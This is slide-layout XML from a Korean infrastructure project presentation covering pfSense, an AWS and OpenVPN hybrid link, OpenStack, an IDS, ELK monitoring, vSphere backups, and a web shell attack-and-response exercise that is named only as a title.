          <p:cNvPr id="30" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2961667"/>
            <a:ext cx="365028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pfSense 운영</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3232329"/>
            <a:ext cx="361645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Routing, NAT,  Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3771900"/>
            <a:ext cx="5238598" cy="76169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3" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3771900"/>
            <a:ext cx="38405" cy="76169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4" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7220103" y="2971800"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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35" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7334403" y="3109874"/>
            <a:ext cx="228600" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="2973629"/>
            <a:ext cx="365028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AWS 하이브리드 연동</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="3244291"/>
            <a:ext cx="361645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클라우드 활용 및 OpenVPN 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571348" y="4724400"/>
            <a:ext cx="5238598" cy="76169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9" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571348" y="4724400"/>
            <a:ext cx="38405" cy="76169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0" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409852" y="4877105"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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1" name="Image 5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547927" y="5015179"/>
            <a:ext cx="181051" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057248" y="4878934"/>
            <a:ext cx="3650285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ELK 통합 관제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057248" y="5149596"/>
            <a:ext cx="3616452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로그 수집 파이프라인 및 대시보드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="4724705"/>
            <a:ext cx="5238598" cy="76169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5" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="4724705"/>
            <a:ext cx="38405" cy="76169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6" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7220255" y="4876495"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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7" name="Image 6" descr="preencoded.png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358329" y="5014570"/>
            <a:ext cx="181051" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867650" y="4878324"/>
            <a:ext cx="3650285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vSphere 백업 전략</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867650" y="5148986"/>
            <a:ext cx="3616452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가상머신 스냅샷 및 복구 계획</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="3772205"/>
            <a:ext cx="5238598" cy="76169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1" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="3772205"/>
            <a:ext cx="38405" cy="76169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2" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7220102" y="3923995"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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3" name="Image 7" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect l="-1080" r="-1080"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7367321" y="4062070"/>
            <a:ext cx="161849" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="3925824"/>
            <a:ext cx="3650285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Ubuntu IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="4196486"/>
            <a:ext cx="3616452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외부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/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내부 패킷 탐지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="5676595"/>
            <a:ext cx="5238598" cy="76169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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="5676595"/>
            <a:ext cx="38405" cy="76169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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410005" y="5829300"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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8" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect l="-1082" r="-1082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557223" y="5967374"/>
            <a:ext cx="161849" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="5831129"/>
            <a:ext cx="365028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공격 시나리오 &amp; 대응</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="6101791"/>
            <a:ext cx="361645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웹쉘 공격 및 계정 탈취 시도 실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="5676595"/>
            <a:ext cx="5238598" cy="761695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B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3" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="5676595"/>
            <a:ext cx="38405" cy="76169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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7220102" y="5829300"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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65" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7334402" y="5967374"/>
            <a:ext cx="228600" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="5831129"/>
            <a:ext cx="365028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결론 및 Q&amp;A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="6101791"/>
            <a:ext cx="361645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한계, 의의 및 질의응답</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769010" y="2076602"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579108" y="2076602"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769010" y="3029407"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579108" y="3029407"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769010" y="3981298"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778383" y="4933798"/>
            <a:ext cx="457200" cy="33375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r">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579260" y="4934102"/>
            <a:ext cx="457200" cy="33375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r">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579108" y="3981602"/>
            <a:ext cx="457200" cy="33375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r">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769010" y="5886907"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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09</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579108" y="5886907"/>
            <a:ext cx="45720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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22D3E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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410004" y="3916823"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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12"/>
          <a:srcRect l="-1082" r="-1082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557222" y="4054897"/>
            <a:ext cx="161849" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057399" y="3918652"/>
            <a:ext cx="365028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OpenStack 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057399" y="4189314"/>
            <a:ext cx="361645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Controller, Compute, Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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571500" y="1047902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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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기반 내부망</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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온프레미스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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접속 검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="4625340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 VPN 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기반 내부망 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="381305"/>
            <a:ext cx="761695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71917" y="1481460"/>
            <a:ext cx="10987624" cy="4053365"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9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32" name="그림 31" descr="텍스트, 스크린샷, 폰트, 소프트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rcRect l="180" t="590" r="580" b="1830"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645710" y="1552663"/>
            <a:ext cx="10844928" cy="3916564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="5651054"/>
            <a:ext cx="10988042" cy="821254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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4" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764263" y="5772626"/>
            <a:ext cx="10612660" cy="56356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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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을 통해 외부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(AWS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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환경에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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내부망</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(172.16.0.0/24)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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으로 안전한 터널을 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty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en-US" altLang="ko-KR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VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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연결 이후 내부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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대역에 위치한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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접속이 정상적으로 이루어짐을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty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ko-KR" altLang="en-US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이를 통해 외부 네트워크에서도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200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내부망</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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자원에 대한 안전한 접근이 가능함을 검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty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35" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="183732" y="6038822"/>
            <a:ext cx="821254" cy="45719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20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71500" y="381305"/>
            <a:ext cx="761695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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844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클라우드 인프라를 구성하는 핵심 서비스 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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523951"/>
            <a:ext cx="3381451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OpenStack 구성요소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1591056"/>
            <a:ext cx="3495751" cy="5266944"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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809244" y="359084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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="441380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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="523676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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600220" y="6131759"/>
            <a:ext cx="3476549" cy="514807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667512" y="6131759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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
